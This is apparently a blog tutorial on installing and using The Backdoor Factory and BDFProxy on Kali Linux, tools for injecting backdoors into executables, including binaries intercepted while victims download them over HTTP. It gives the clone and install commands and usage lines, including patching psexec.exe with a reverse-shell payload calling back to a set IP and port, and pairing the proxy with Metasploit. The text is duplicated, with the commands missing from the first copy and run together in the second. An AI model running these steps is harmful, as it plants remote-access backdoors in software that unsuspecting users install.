Do Not Trust Your Download Even It Is From The Trusted Source
Joshua Pitts developed a tool suite for injecting backdoor to executable files of Windows, Linux and Mac OSX as well as FreeBSD. The process is fully automatically even you do not know what code cave is.
The tool suite is namely The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. The BDFProxy is working for HTTP protocol only.
Joshua Pitts discovers that one of the Tor Network Exit Nodes doing code injection to the binaries which are downloaded by victims via Tor network. His blog is showing how it will be and the interview report is talking about that.
How to install BDFactory on Kali Linux 1.0.9a?
BDFactory is working very well with Metasploit Framework.
Install BDFactory :
To update :
Install BDFProxy :
To update :
Usage of BDFactory :
Usage of BDFProxy :
*change the settings when necessary
*if you are working with Pineapple, you need run ./wpBDF.sh to configure your environment
Conclusion
Don't trust your downloaded binary even it is downloaded from the trusted source when it is delievered via HTTP. Meanwhile, please download binaries in Tor network with care.
Please DO NOT use this tool suite for illegal purpose; otherwise, you will be put into the jail.
REFERENCE
Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines
Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing
That's all! See you.
The tool suite is namely The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. The BDFProxy is working for HTTP protocol only.
Joshua Pitts discovers that one of the Tor Network Exit Nodes doing code injection to the binaries which are downloaded by victims via Tor network. His blog is showing how it will be and the interview report is talking about that.
How to install BDFactory on Kali Linux 1.0.9a?
BDFactory is working very well with Metasploit Framework.
apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove
apt-get install python-pipInstall BDFactory :
cd ~
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
./install.shTo update :
./update.shInstall BDFProxy :
cd ~
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
./install.shTo update :
./update.shUsage of BDFactory :
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcpUsage of BDFProxy :
nano bdfproxy.cfg*change the settings when necessary
./bdf_proxy.pymsfconsole -r bdfproxy_msf_resource.rc*if you are working with Pineapple, you need run ./wpBDF.sh to configure your environment
Conclusion
Don't trust your downloaded binary even it is downloaded from the trusted source when it is delievered via HTTP. Meanwhile, please download binaries in Tor network with care.
Please DO NOT use this tool suite for illegal purpose; otherwise, you will be put into the jail.
REFERENCE
Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines
Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing
That's all! See you.